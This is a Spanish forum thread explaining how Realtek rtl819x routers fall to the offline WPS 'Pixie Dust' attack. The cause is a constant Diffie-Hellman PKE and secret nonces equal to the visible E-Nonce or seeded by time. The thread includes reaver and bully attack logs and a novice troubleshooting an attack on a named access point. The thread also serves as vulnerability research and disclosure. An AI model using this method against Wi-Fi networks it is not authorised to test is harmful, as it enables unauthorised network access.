El libre pensamiento para un internet libre
No estas registrado.
- Temas: Activo | Sin respuesta
Anuncio
#1 12-04-2015 17:40:35
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,701
Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
El método de brute force offline al estilo "Pixie dust" es adaptable a los dispositivos equipados de chipset realtek
¡Gran noticia! . 
Les cuento ahora la historia de este descubrimiento alucinante con todos los detalles. 
Lo dejaba claramente entender ayer mañana en esta respuesta :
Betis escribió:cuando un nounce se repite aunque sea diferente mi teoria es que de algun lado se genera una nueva clave, o cadena de paso para genera alguna parte de ES-0 de ES2 o bien de E-Hash o cuaquier de los PKE,PKR en el paso de M2 ante de llega a M3 pero bueno no te puedo decir nada asta ver por mi mismo ey probarlo en directo seria interesante analiza un cap con la variable de este bug
En este caso (SDK realtek rtl9xxx); lo que pasa es que el punto de acceso genera siempre la misma PKE; cual sea el router.
Por lo tanto tenemos una entropía nula del lado del punto de acseso en el intercambio de llave DF.
Entonces podemos efectuar un ataque tipo Pixie dust contra Realtek si sabemos cual es el valor (, o como se genera ) empleado para ES1 y ES2
Sabemos que no es 0 como en el caso Ralink o que nos es el mismo intervalo que con los broadcom afectados
Pronto les dije cual es.
"Pixie Dust" ataque de fuerza bruta offline para generar el PIN valido - respuesta 52
Tenía que guardar el "secreto" hasta que nuestro amigo soxrok2212 anunciase oficialmente la cosa en el hilo "Pixie Dust" de kali.
Ya ha hablado (cf WPS Pixie Dust Attack (Offline WPS Attack) - respuesta 180 ) así que yo también puedo.
Después la salida de pixiewps - que materializó semanas de esfuerzos - hemos decidido no parrar en camino y intentar seguir investigando conjuntamente el caso de los chipsets realtek con el material que tenemos.
Personalmente tengo un afla AIPWH525 y un totolink 300NR y soxrok un belkin F9K1110
Tres Routers bastante modernos con chipset de marca realtek.
Cada router tiene un chipset diferente pero lo que tiene en común es que comparten la "misma base" : el kit de desarrolló SDK "RTL819X" conocido como "proyecto rtl819x"
1) Parámetros WPS por defecto pésimos : WPS activado con un PIN fijo (no se puede cambiar)
Lo primero que nos ha llamado la atención (y nos ha animado a seguir adelante) es que estos routers tienen el wps... pasar me la expresión... como el culo.
Esta todo pensado al revés. Por ejemplo hay desactivar el WPS:
WPS ACTIVADO POR DEFECTO
PIN FIJO PERMANENTE
Cuando miramos el apartado WPS de las interfaces de configuración nos damos cuenta que son iguales: solo cambia el aspecto gráfico
Y podemos notar que ambos PIN por defecto empiezan por 0.
¿Coincidencia? ¿O no?...
.... Si estaríamos en un sistema aleatorio puro teníamos una probabilidad sobre 20 de encontrar dos veces 0 como primer dígito....
¿Sospechoso?
Un poco/bastante. 
Pero no es nada en comparación con lo que descubrimos a continuación...
PD: ... la unica cosa que salvaba estos PA es que tienen un AP rate limit que se dispara después tres intentos, de los chungos.
Pero si podemos hacer un ataque pixie dust, de nada sirve (un solo intento fallido)
2) Repetición de la misma PKE cual sea el modelo...
A continuación les dejo unas muestras de un ataque con reaver_mod contra mis punto de acceso...
Son estas muestras que nos hicieron literalmente "flipar en colores". Pero sin recurrir a paraísos artificiales , claros y frescos como unas rosas....
[P] E-Nonce: 1d:f2:a6:ab:10:f3:61:00:1d:2d:56:9c:68:d0:58:53
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[+] Received M1 message
[P] AuthKey: 6c:7e:a0:4f:2b:e4:cc:a1:3c:98:8e:c3:96:0a:9f:0e:95:ab:9c:a0:0f:c5:6d:ab:19:5b:1a:e2:48:67:9e:40
[+] Sending M2 message
[P] E-Hash1: d7:26:cf:5e:09:8c:52:dd:4d:13:6b:0c:69:f8:23:59:ab:b3:09:03:bf:38:37:b6:36:ed:b1:12:30:9f:64:71
[P] E-Hash2: 3d:31:26:b1:34:28:c6:7c:ad:30:5c:b9:4f:38:b6:15:a6:2b:c1:e9:ad:59:28:6c:fe:cc:a3:de:38:68:c6:b0
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:d4:51:9e:42:ba:11:b7:6c:09:b2:90:07:5c:ee:4a
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[+] Received M1 message
[P] AuthKey: d9:83:51:60:84:b7:0d:e2:11:86:c3:cf:9c:bb:5c:81:9c:9f:06:91:81:6e:cb:59:fc:92:96:5e:61:25:9a:ea
[+] Sending M2 message
[P] E-Hash1: 8a:00:55:d9:8a:73:cc:98:61:17:0a:2f:40:57:43:40:0b:59:c8:3c:26:dd:08:3d:7f:0b:19:2e:ee:22:fc:de
[P] E-Hash2: f7:93:87:f9:da:14:fc:18:ef:6a:cf:c0:50:0a:70:47:e5:1c:65:9d:a9:c2:03:d0:62:af:02:25:08:ff:28:91
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 60:19:2e:67:35:16:6b:e7:7b:60:be:20:66:5d:65:54
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e]8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
Siempre la misma PKE 
INCONCEBIBLE
Y más fuerte aún... : Sale en permanencia la misma PKE en mi otro punto de acceso:
[P] E-Nonce: 44:b2:7a:8a:4b:93:b5:20:57:ba:f9:47:5e:12:e8:d2
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[+] Received M1 message
[P] AuthKey: 65:6f:56:03:5e:3a:ac:4e:eb:86:23:c4:3b:ab:e4:e0:a2:27:36:cb:69:04:9f:4a:8c:2a:79:a3:52:14:ed:e4
[+] Sending M2 message
[P] E-Hash1: 25:08:23:59:07:bb:fd:bb:ce:13:03:85:9b:b4:9b:25:ff:4d:9b:6a:ac:37:f0:d9:b2:22:b2:28:6a:95:74:dd
[P] E-Hash2: 2f:9e:f7:2d:1f:a9:99:8a:3e:10:4b:42:45:9d:43:fb:56:2f:bb:44:8b:5b:74:08:2d:1b:b0:45:b1:3a:f0:26
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 0e:47:95:66:69:fd:b4:85:0b:b3:0f:94:18:f2:c1:06
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[+] Received M1 message
[P] AuthKey: ed:d6:a1:b0:a5:02:87:8a:af:c1:8f:f1:81:40:e9:64:04:f7:36:9d:8f:17:c4:f7:78:00:5d:2a:7b:de:90:da
[+] Sending M2 message
[P] E-Hash1: 9c:c8:05:1e:cd:f4:a6:cd:d7:cf:09:e0:68:a3:42:1b:da:45:cd:04:ec:1c:bc:95:79:92:10:3f:c1:52:0c:b4
[P] E-Hash2: 2b:61:69:da:34:64:15:58:e3:0b:0a:71:44:fd:7f:51:a7:00:fb:2a:24:fb:49:56:18:cb:8f:08:3b:f5:df:60
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 29:ef:40:48:13:90:ac:c4:58:ec:ad:b8:2a:c7:fc:ce
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
3) Primeras conclusiones
Tenemos una implementación, pasarme la expresión, de mierda.
Les recuerdo que teóricamente la PKE no debría repetirse.
Si La PKE se repite a veces es que tenemos a un sistema con entropía muy débil a nivel del intercambio de laves diffie hellmann
Si la PKE se repite reprime es simplemente que.... no hay entropiá ninguna. Y aqui tenemos cero entropía : siempre se usan los mismos valores para generar las PKE.
Sabemos que
La PKE (enrolle = el router) se forma así : g^A mod p
La PKR (registar = se forma así : g^B mod p
Somos capaces de detreminar "g" "A" y "mod p" que son siempre iguales y por lo tanto seremos capaces de adivinar el valor de B.
Hasta aquí llegamos con el compañero sorcxok... y nos decimos : "si tenemos un sitema de entropia nula para el intercambio de llave es seguro que tenemos también una entropía nula más tarde en el protocolo cuando se generan ES1 y ES2".
Nos enfrentamos a la misma situación que con los chipsets Ralink : solo que el valor para generar ES1 y ES2 no es 0.
Es otra cosa.
Asi que decidmos escribir a dominque Bongard para que nos ayude o por lo menos que nos diga si estamos en la buena vía.
4) Dominique Bongard analiza el problema y encuentra la brecha
Lo primero es decir bien alto lo amable y enrollado que es dominique Bongard.
Respondí ensegudia dicendo que iba a echar un ojo y pidiendonos más datos y un firmware...
Y dos días despues nos escribe para dar nos la solución 
Sin pedir nada - o lo que sea - nos la regala sin más, explicándonos en detalles el porque 
Adivinar que se le ocurierón a los ingenios de realtek....
ES-1 = ES-2 = E-Nonce
Es decir usar la misma cadena que es visible y en claro...... 
No es 0 como para Ralink.
Es cierto; pero estamos al mismo niverl incompetencia.
Esto si mandamos los PIN en un segundo (ritmo por defecto en reaver ) y usando llaves DH largas (lo que significa que en este caso no podremos usar el opción -S en reaver) Dominique nos explica que es porque se usa el tiempo como semilla ( random_r.c )
¿Que pasaría si mandamos los PIN en mas de un segundo (distancia, interferencias etc...)?
En este caso podemos usar un segundo método para derivar nuestro PIN :
Simple; hacemos como para los Broadcom; un brute force del estado del PRNG.
Y en lugar de usar el intervalo que usa broadcom usaremos el tiempo sobre, digamos, un docena de segundos,
O treinta, o incluso dos minutos... ¡No importa! :
Se encuentra la coincidencia en un micro-segundo.
Incluso si, para ser seguro, usamos los 3600 segundos posibles que componen una hora
EDIT
Al final hemos podido comprobar que algunos chipset usan el momento del intercambio WPS y otros usan la fecha de la instalación del firmware en uso.
Asi que en unos casos el PIN se obtiene al instante y en otros se debe hacer un brute force de la semilla hasta llegar a la fecha de la instalación del firmware.
Para hacer este brute force el amigo wiire ha implementado en un primer tiempo el opción "-f" en pixiewps.
Luego la ha quitado porque pixiewps lo hace automáticamente cuando no encuentra el PIN al instante
El Pin valido se obtiene así en pocos minutos.
En conclusión
Al final podemos decir que realtek ha hecho las cosas un poco mejor que ralink y un poco peor que broadcom.
Si lanzamos el PIN en un segundo solo adaptamos el caso (y el código) ralink cambiando el cero de nuestras ES1 y ES2 por la nonce del router.
Si no conseguimos mandar el PIN en un segundo (o menos) cambiamos de táctica y usamos el método broadcom para hacer un brute force del estado del generador de números pseudo aleatorios. Pero esta vez usaremos valores de tiempo como semilla
Wiire esta integrando los cambios en pixiewps (que ha sido oficialmente integrada en los repositorios de kali linux) y se sigue trabajando sobre reaver para hacer un ataque mas preciso.
Se trata de un tremendo avance ya que afecta a chipset modernos y a material producido sobre los cuatro últimos años (por lo menos) y aún en producción.
Muchas gracias a Dominique por habernos escuchado, atendido y por regalar nos tan gentilmente la solución y los detalles para poner de pie un método para explotar la brecha.
edit : aqui el tweet de dominique al respecto :
Desconectado
Anuncio
#2 31-03-2016 18:18:35
- sergio1985
- Usuario
- Registrado: 02-03-2016
- Mensajes: 24
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Bien explicado gracias era lo que estaba buscando mac 00:13:33 realtek RTL 8671 wps model EV-2006-07-27 wps model ahora solo me queda probar y haber si tenemos suerte saludos
Desconectado
#3 31-03-2016 21:11:49
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,701
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Buenas
RTL 8671 Esto me suena a uno de estos chipset "onboard" y no tengo claro que sea vulnerable... pero por otro lado tienes la misma etiqueta en "versión del wPS" que uno vulnerable :
EV-2006-07-27 El opción brute force va mucho mas rápido con la ultima versión de pixiewps y te tomara 4-5 minutos como máximo (en lugar de 20-30)
Si tienes la misma PKE que la que ves en el tema, debería poder hacerse...
Cuéntanos cómo te ha ido...
Suerte
Desconectado
#4 19-05-2016 05:33:22
- sergio1985
- Usuario
- Registrado: 02-03-2016
- Mensajes: 24
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Buenas a ver que opinas me tarde pero estoy aprendiendo soy novato en esto utilizo kali 2016.1 booteado en usb con adaptador alfa awuso36nh con antena direccional yagui
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
[P] E-Nonce: 47:7e:ca:09:55:02:39:8a:05:0f:be:a0:4c:ab:fc:f8
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: b1:71:59:a8:11:56:37:b3:1a:64:84:0d:39:24:fc:dc
[P] PKR: 3c:5f:43:6e:d3:3a:57:d6:3c:20:f1:f3:9b:c2:c4:0d:65:29:32:b5:dc:5a:05:de:21:48:7f:74:c9:f3:41:7e:f8:3e:4a:55:ce:63:81:bf:01:50:07:ea:7a:00:22:c0:97:95:87:87:99:88:54:9e:67:ee:e2:eb:ab:96:42:ee:a2:ae:b2:d3:a2:a9:95:76:30:0e:89:19:54:ae:d4:be:63:5c:ac:c8:2a:59:5b:e1:46:b0:7d:34:20:09:44:cc:7f:f2:4e:81:21:b9:a5:53:d5:26:29:b5:86:4a:a2:cc:d0:18:ce:76:3e:0d:c9:bd:68:80:74:92:c9:0e:ee:4d:ba:da:22:31:4a:01:ca:7f:6e:84:2e:27:34:6c:db:e3:2f:12:c9:9c:81:9d:60:48:ca:ea:42:01:b1:ff:4f:ed:24:85:f3:87:3e:9d:e9:e2:1f:40:b6:9f:bb:76:4f:60:b7:14:f2:04:67:38:68:89:19:27:d0:02:40:bd:f7:66
[P] AuthKey: 09:84:cc:3e:23:40:6c:7f:fa:08:57:f8:2f:5d:a4:7a:6c:a1:12:2a:66:d9:d2:f4:b7:89:36:41:c2:4b:b4:6e
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.comparando no son iguales no se repiten
[P] E-Nonce: 0b:04:55:50:49:7c:fc:d6:2c:bb:6b:4b:44:81:1f:de
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: b1:f7:fc:e4:08:da:ec:15:46:0b:1c:b7:b2:bc:6c:78
[P] PKR: 2d:63:6d:74:cd:dc:8d:2a:f2:7a:c7:cf:eb:40:d6:2e:9c:9e:0e:2f:99:c2:42:de:e5:36:26:60:a6:88:c9:5b:d7:4e:9d:b2:8b:a2:c8:65:2c:ca:3f:c2:e8:3a:f1:4f:f0:d3:3f:a8:cf:2f:67:b8:5c:6d:2f:4b:96:03:82:c6:71:51:1b:ed:12:fa:f6:ea:94:78:38:82:ea:7c:44:0a:ef:1d:56:12:a8:bd:9b:9c:a2:8f:16:8e:be:be:d9:86:61:5d:3c:9c:ad:ea:9d:21:76:28:a5:58:94:94:0f:fb:71:10:40:b1:31:67:74:2d:17:9c:e4:bc:75:42:7d:2c:25:15:13:b1:48:51:0c:e3:ce:c6:16:ec:f7:9e:ac:90:1c:5b:11:9b:57:95:45:69:21:d4:3c:9d:83:f6:2e:9b:e2:c9:f5:6c:8f:10:dd:aa:8c:27:aa:70:28:e2:06:0d:81:7a:06:a6:e8:72:37:f5:79:1b:58:1d:a4:9e:0e:b1
[P] AuthKey: 8d:74:30:cf:46:b2:1f:10:6e:70:c2:7b:98:ea:47:3d:72:16:6f:df:73:8e:68:92:2e:91:43:9e:31:ba:09:19
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670. Desconectado
#5 19-05-2016 13:20:30
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,701
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Buenas
He editado tu mensaje usando el opción insertar código para lo que sale en consola (así se hace en los foros )
El problema aquí es que no recibes el M3 y sin el M3 no puedes hacer un ataque pixiedust.
Hay dos razones posibles :
condiciones de recepción-emisión (estas demasiado lejo del PA, hay demasiadas interferencias)
El WPS PIN no esta habilitado del todo (puede que este solo en modo Push button, puede que no tenga el PIN configurado)
alfa awuso36nh
Mala elección, el chipset no funciona bien con reaver, puede que sea la razón, es una tercera razón posible para explicar el falló.
Has probado con bully?
Va mejor que reaver con este chipset (RT3070)
omparando no son iguales no se repiten
Si son iguales, fijate bien, es la PKE, no la PKR
Tienes la misma PKE que todos los chipset realteck vulnerables
d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b(la que sale en rojo en le primer post de este tema )
Desconectado
#6 21-05-2016 18:25:30
- sergio1985
- Usuario
- Registrado: 02-03-2016
- Mensajes: 24
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Bueno aqui la informacion con bully sin buenos resultados segun mi persona a ver a ti que te parece
ç
root@kali:~# sudo bully wlan1mon -b 00:13:33:XXXXXXX -c 1 -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan1mon' to channel '1'
[!] Using '00:0d:b0:XXXXXXX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '00:13:33:c5:84:a5' on channel '1'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'Rocabado' (00:13:33:c5:84:a5)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/001333XXXXXX.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
